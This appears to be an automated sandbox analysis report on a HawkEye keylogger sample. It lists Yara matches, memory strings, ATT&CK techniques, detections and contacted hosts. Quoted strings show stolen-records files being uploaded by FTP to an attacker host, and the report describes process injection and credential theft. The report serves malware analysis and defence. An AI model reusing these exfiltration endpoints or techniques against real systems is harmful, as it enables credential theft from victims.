                  Source: Yara matchFile source: 16.2.InstallUtil.exe.4089930.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.InstallUtil.exe.408208.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.InstallUtil.exe.40a1b50.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.4ac319a.11.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.4ac319a.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.4acafa7.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.InstallUtil.exe.40a1b50.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.48ba66a.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.4ac95a2.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.472e905.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.472cf00.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.48ba66a.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.48c0a72.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.48c2477.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000010.00000002.494750181.0000000004081000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.364855957.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.324877095.0000000004838000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.324260828.0000000004726000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: FukQGQj7cl.exe PID: 4792, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6284, type: MEMORYSTR

                  Remote Access Functionality:

                  barindex
                  Detected HawkEye RatShow sources
                  Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                  Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                  Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                  Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                  Source: InstallUtil.exe, 00000010.00000002.486099792.0000000001285000.00000004.00000020.sdmpString found in binary or memory: /HawkEye_Keylogger_Stealer_Records_632922 8.10.2021 4:55:54 PM.txt
                  Source: InstallUtil.exe, 00000010.00000002.494142383.0000000003476000.00000004.00000001.sdmpString found in binary or memory: lAHawkEye_Keylogger_Stealer_Records_632922 8.10.2021 4:55:54 PM.txt
                  Source: InstallUtil.exe, 00000010.00000002.494142383.0000000003476000.00000004.00000001.sdmpString found in binary or memory: l\ftp://ftp.badonfashoin.com/HawkEye_Keylogger_Stealer_Records_632922 8.10.2021 4:55:54 PM.txt
                  Source: InstallUtil.exe, 00000010.00000002.494142383.0000000003476000.00000004.00000001.sdmpString found in binary or memory: ftp://ftp.badonfashoin.com/HawkEye_Keylogger_Stealer_Records_632922%208.10.2021%204:55:54%20PM.txt
                  Source: InstallUtil.exe, 00000010.00000002.494142383.0000000003476000.00000004.00000001.sdmpString found in binary or memory: lbftp://ftp.badonfashoin.com/HawkEye_Keylogger_Stealer_Records_632922%208.10.2021%204:55:54%20PM.txt
                  Source: InstallUtil.exe, 00000010.00000002.494199612.0000000003484000.00000004.00000001.sdmpString found in binary or memory: lAHawkEye_Keylogger_Stealer_Records_632922 8.10.2021 4:55:54 PM.txtP
                  Source: InstallUtil.exe, 00000010.00000002.494199612.0000000003484000.00000004.00000001.sdmpString found in binary or memory: lHSTOR HawkEye_Keylogger_Stealer_Records_632922 8.10.2021 4:55:54 PM.txt
                  Source: InstallUtil.exe, 00000010.00000002.494199612.0000000003484000.00000004.00000001.sdmpString found in binary or memory: STOR HawkEye_Keylogger_Stealer_Records_632922 8.10.2021 4:55:54 PM.txt
                  Source: InstallUtil.exe, 00000010.00000002.489551476.0000000003081000.00000004.00000001.sdmpString found in binary or memory: HawkEyeKeylogger
                  Source: InstallUtil.exe, 00000010.00000002.489551476.0000000003081000.00000004.00000001.sdmpString found in binary or memory: l&HawkEye_Keylogger_Execution_Confirmed_
                  Source: InstallUtil.exe, 00000010.00000002.489551476.0000000003081000.00000004.00000001.sdmpString found in binary or memory: l"HawkEye_Keylogger_Stealer_Records_
                  Source: InstallUtil.exe, 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                  Source: InstallUtil.exe, 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                  Source: InstallUtil.exe, 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                  Source: InstallUtil.exe, 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                  Yara detected HawkEye KeyloggerShow sources
                  Source: Yara matchFile source: 16.2.InstallUtil.exe.45fa72.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.InstallUtil.exe.408208.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.4ac319a.11.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.4ac319a.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.4acafa7.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.478476a.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.48ba66a.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.4ac95a2.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.472e905.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.472cf00.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.48ba66a.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.48c0a72.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.48c2477.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.InstallUtil.exe.30ab2a0.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.324877095.0000000004838000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.324260828.0000000004726000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.489551476.0000000003081000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: FukQGQj7cl.exe PID: 4792, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6284, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Replication Through Removable Media1Windows Management Instrumentation1Application Shimming1Application Shimming1Disable or Modify Tools1OS Credential Dumping1System Time Discovery1Replication Through Removable Media1Archive Collected Data1Exfiltration Over Alternative Protocol1Encrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsNative API1Boot or Logon Initialization ScriptsProcess Injection312Deobfuscate/Decode Files or Information1Input Capture1Peripheral Device Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsShared Modules1Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information2Credentials in Registry2Account Discovery1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationRemote Access Software1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing1Credentials In Files1File and Directory Discovery1Distributed Component Object ModelInput Capture1Scheduled TransferNon-Application Layer Protocol1SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsSystem Information Discovery18SSHClipboard Data1Data Transfer Size LimitsApplication Layer Protocol12Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion21Cached Domain CredentialsQuery Registry1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection312DCSyncSecurity Software Discovery31Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobHidden Files and Directories2Proc FilesystemVirtualization/Sandbox Evasion21Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowProcess Discovery4Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                  Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingApplication Window Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                  Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureSystem Owner/User Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                  Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeyloggingRemote System Discovery1Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 462697 Sample: FukQGQj7cl Startdate: 10/08/2021 Architecture: WINDOWS Score: 100 42 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 8 other signatures 2->48 7 FukQGQj7cl.exe 15 4 2->7         started        process3 dnsIp4 28 www.google.com 142.250.185.196, 443, 49715 GOOGLEUS United States 7->28 22 C:\Users\user\AppData\...\InstallUtil.exe, PE32 7->22 dropped 24 C:\Users\user\AppData\...\FukQGQj7cl.exe.log, ASCII 7->24 dropped 50 Writes to foreign memory regions 7->50 52 Hides that the sample has been downloaded from the Internet (zone.identifier) 7->52 54 Injects a PE file into a foreign processes 7->54 12 InstallUtil.exe 14 4 7->12         started        file5 signatures6 process7 dnsIp8 30 ftp.badonfashoin.com 45.141.152.18, 21, 49745, 49746 M247GB Romania 12->30 32 90.168.9.0.in-addr.arpa 12->32 56 Changes the view of files in windows explorer (hidden files and folders) 12->56 58 Writes to foreign memory regions 12->58 60 Sample uses process hollowing technique 12->60 62 Injects a PE file into a foreign processes 12->62 16 vbc.exe 1 12->16         started        19 vbc.exe 13 12->19         started        signatures9 process10 dnsIp11 34 Tries to steal Mail credentials (via file registry) 16->34 36 Tries to steal Instant Messenger accounts or passwords 16->36 38 Tries to steal Mail credentials (via file access) 16->38 26 192.168.2.1 unknown unknown 19->26 40 Tries to harvest and steal browser information (history, passwords, etc) 19->40 signatures12

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  FukQGQj7cl.exe46%VirustotalBrowse
                  FukQGQj7cl.exe36%ReversingLabsWin32.Trojan.Sabsik
                  FukQGQj7cl.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\InstallUtil.exe0%MetadefenderBrowse
                  C:\Users\user\AppData\Local\Temp\InstallUtil.exe0%ReversingLabs

                  Unpacked PE Files

                  SourceDetectionScannerLabelLinkDownload
                  16.2.InstallUtil.exe.400000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
                  16.2.InstallUtil.exe.400000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
                  1.2.FukQGQj7cl.exe.4ac319a.11.unpack100%AviraTR/Inject.vcoldiDownload File
                  22.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1125438Download File
                  1.2.FukQGQj7cl.exe.48ba66a.6.unpack100%AviraTR/Inject.vcoldiDownload File

                  Domains

                  SourceDetectionScannerLabelLink
                  ftp.badonfashoin.com1%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  http://ns.adobe.cobj2A0%Avira URL Cloudsafe
                  http://crl.pki.goog/gsr1/gsr1.crl0;0%URL Reputationsafe
                  http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                  http://crls.pki.goog/gts1c3/moVDfISia2k.crl00%Avira URL Cloudsafe
                  http://fontfabrik.comB0%Avira URL Cloudsafe
                  http://www.tiro.comsUKAi0%Avira URL Cloudsafe
                  http://www.tiro.com0%URL Reputationsafe
                  http://ns.adobe.c/g0%URL Reputationsafe
                  http://www.goodfont.co.kr0%URL Reputationsafe
                  http://www.carterandcone.com0%URL Reputationsafe
                  http://pki.goog/repo/certs/gtsr1.der040%URL Reputationsafe
                  http://www.sajatypeworks.com0%URL Reputationsafe
                  http://www.typography.netD0%URL Reputationsafe
                  http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                  http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                  http://fontfabrik.com0%URL Reputationsafe
                  http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                  http://www.sandoll.co.kr0%URL Reputationsafe
                  http://www.urwpp.deDPlease0%URL Reputationsafe
                  http://www.zhongyicts.com.cn0%URL Reputationsafe
                  http://www.sakkal.com0%URL Reputationsafe
                  http://www.tiro.comWUgA0%Avira URL Cloudsafe
                  http://www.tiro.comEUuA0%Avira URL Cloudsafe
                  http://fontfabrik.comsUKAi0%Avira URL Cloudsafe
                  http://ns.adobe.c/g2A0%Avira URL Cloudsafe
                  http://www.fonts.comcNUlA(0%Avira URL Cloudsafe
                  http://ns.adobe.cobj0%URL Reputationsafe
                  http://crl.pki.goog/gtsr1/gtsr1.crl0W0%URL Reputationsafe
                  http://www.fonts.comicXU0%Avira URL Cloudsafe
                  http://www.carterandcone.comLP0%Avira URL Cloudsafe
                  http://pki.goog/gsr1/gsr1.crt020%URL Reputationsafe
                  https://pki.goog/repository/00%URL Reputationsafe
                  http://www.carterandcone.coml0%URL Reputationsafe
                  http://ftp.badonfashoin.com0%Avira URL Cloudsafe
                  http://www.founder.com.cn/cn0%URL Reputationsafe
                  http://ns.ado/12A0%Avira URL Cloudsafe
                  http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                  http://www.tiro.comcomEUuA0%Avira URL Cloudsafe
                  http://ns.ado/10%URL Reputationsafe
                  http://pki.goog/repo/certs/gts1c3.der00%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  ftp.badonfashoin.com
                  		45.141.152.18
                  		truetrueunknown
                  www.google.com
                  		142.250.185.196
                  		truefalse
                    		high
                    90.168.9.0.in-addr.arpa
                    		unknown
                    		unknownfalse
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://ns.adobe.cobj2AFukQGQj7cl.exe, 00000001.00000003.230610513.000000000994A000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.fontbureau.com/designersGInstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpfalse
                        		high
                        http://crl.pki.goog/gsr1/gsr1.crl0;FukQGQj7cl.exe, 00000001.00000002.310372719.00000000013A2000.00000004.00000020.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designers/?InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpfalse
                          		high
                          http://www.founder.com.cn/cn/bTheInstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designers?InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpfalse
                            		high
                            http://crls.pki.goog/gts1c3/moVDfISia2k.crl0FukQGQj7cl.exe, 00000001.00000002.310372719.00000000013A2000.00000004.00000020.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://fontfabrik.comBInstallUtil.exe, 00000010.00000003.314578251.00000000061EB000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.tiro.comsUKAiInstallUtil.exe, 00000010.00000003.315611989.00000000061EB000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.tiro.comInstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp, InstallUtil.exe, 00000010.00000003.315759111.00000000061EB000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designersInstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp, InstallUtil.exe, 00000010.00000003.326807641.00000000061DE000.00000004.00000001.sdmpfalse
                              		high
                              http://ns.adobe.c/gFukQGQj7cl.exe, 00000001.00000003.306427088.0000000009950000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.goodfont.co.krInstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.carterandcone.comInstallUtil.exe, 00000010.00000003.319806893.00000000061E9000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers/cabarga.htmln-usInstallUtil.exe, 00000010.00000003.329177139.000000000620A000.00000004.00000001.sdmpfalse
                                		high
                                http://schema.org/WebPageFukQGQj7cl.exe, 00000001.00000002.312563898.0000000002ECF000.00000004.00000001.sdmpfalse
                                  		high
                                  http://pki.goog/repo/certs/gtsr1.der04FukQGQj7cl.exe, 00000001.00000002.310372719.00000000013A2000.00000004.00000020.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.sajatypeworks.comInstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.typography.netDInstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://www.google.comFukQGQj7cl.exe, 00000001.00000002.312280965.0000000002EA1000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.founder.com.cn/cn/cTheInstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.galapagosdesign.com/staff/dennis.htmInstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://fontfabrik.comInstallUtil.exe, 00000010.00000003.314395304.00000000061EB000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designersdInstallUtil.exe, 00000010.00000003.326807641.00000000061DE000.00000004.00000001.sdmpfalse
                                      		high
                                      http://whatismyipaddress.com/-FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmpfalse
                                        		high
                                        http://www.galapagosdesign.com/DPleaseInstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://login.yahoo.com/config/loginvbc.exefalse
                                          		high
                                          http://www.fonts.comInstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.sandoll.co.krInstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.site.com/logs.phpInstallUtil.exe, 00000010.00000002.489551476.0000000003081000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.urwpp.deDPleaseInstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.nirsoft.net/vbc.exe, vbc.exe, 00000016.00000002.364855957.0000000000400000.00000040.00000001.sdmpfalse
                                                		high
                                                http://www.zhongyicts.com.cnInstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameFukQGQj7cl.exe, 00000001.00000002.312280965.0000000002EA1000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.489551476.0000000003081000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://www.sakkal.comInstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.tiro.comWUgAInstallUtil.exe, 00000010.00000003.315250712.00000000061EB000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.tiro.comEUuAInstallUtil.exe, 00000010.00000003.315478837.00000000061EB000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://fontfabrik.comsUKAiInstallUtil.exe, 00000010.00000003.314280047.00000000061EB000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://ns.adobe.c/g2AFukQGQj7cl.exe, 00000001.00000003.230610513.000000000994A000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.apache.org/licenses/LICENSE-2.0InstallUtil.exe, 00000010.00000003.319415666.00000000061E8000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://www.fontbureau.comInstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.fonts.comcNUlA(InstallUtil.exe, 00000010.00000003.313190214.00000000061EB000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		low
                                                      http://ns.adobe.cobjFukQGQj7cl.exe, 00000001.00000003.306427088.0000000009950000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://crl.pki.goog/gtsr1/gtsr1.crl0WFukQGQj7cl.exe, 00000001.00000002.310372719.00000000013A2000.00000004.00000020.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.fonts.comicXUInstallUtil.exe, 00000010.00000003.313322897.00000000061EB000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.carterandcone.comLPInstallUtil.exe, 00000010.00000003.320005338.00000000061E7000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://pki.goog/gsr1/gsr1.crt02FukQGQj7cl.exe, 00000001.00000002.310372719.00000000013A2000.00000004.00000020.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://pki.goog/repository/0FukQGQj7cl.exe, 00000001.00000002.310372719.00000000013A2000.00000004.00000020.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.carterandcone.comlInstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.fontbureau.com/designers/cabarga.htmlNInstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://ftp.badonfashoin.comInstallUtil.exe, 00000010.00000002.494142383.0000000003476000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.founder.com.cn/cnInstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.fontbureau.com/designers/frere-jones.htmlInstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpfalse
                                                          		high
                                                          http://ns.ado/12AFukQGQj7cl.exe, 00000001.00000003.230610513.000000000994A000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.jiyu-kobo.co.jp/InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.fontbureau.com/designers8InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpfalse
                                                            		high
                                                            http://www.tiro.comcomEUuAInstallUtil.exe, 00000010.00000003.315832509.00000000061EB000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://www.google.com/accounts/serviceloginvbc.exefalse
                                                              		high
                                                              http://www.fontbureau.com/designers/InstallUtil.exe, 00000010.00000003.326807641.00000000061DE000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://www.google.com/FukQGQj7cl.exe, 00000001.00000002.312280965.0000000002EA1000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  http://ns.ado/1FukQGQj7cl.exe, 00000001.00000003.306427088.0000000009950000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://pki.goog/repo/certs/gts1c3.der0FukQGQj7cl.exe, 00000001.00000002.310372719.00000000013A2000.00000004.00000020.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown

                                                                  Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  142.250.185.196
                                                                  		www.google.comUnited States
                                                                  		15169GOOGLEUSfalse
                                                                  45.141.152.18
                                                                  		ftp.badonfashoin.comRomania
                                                                  		9009M247GBtrue

                                                                  Private

                                                                  IP
                                                                  192.168.2.1

                                                                  General Information

                                                                  Joe Sandbox Version:33.0.0 White Diamond
                                                                  Analysis ID:462697
                                                                  Start date:10.08.2021
                                                                  Start time:16:46:06
                                                                  Joe Sandbox Product:CloudBasic
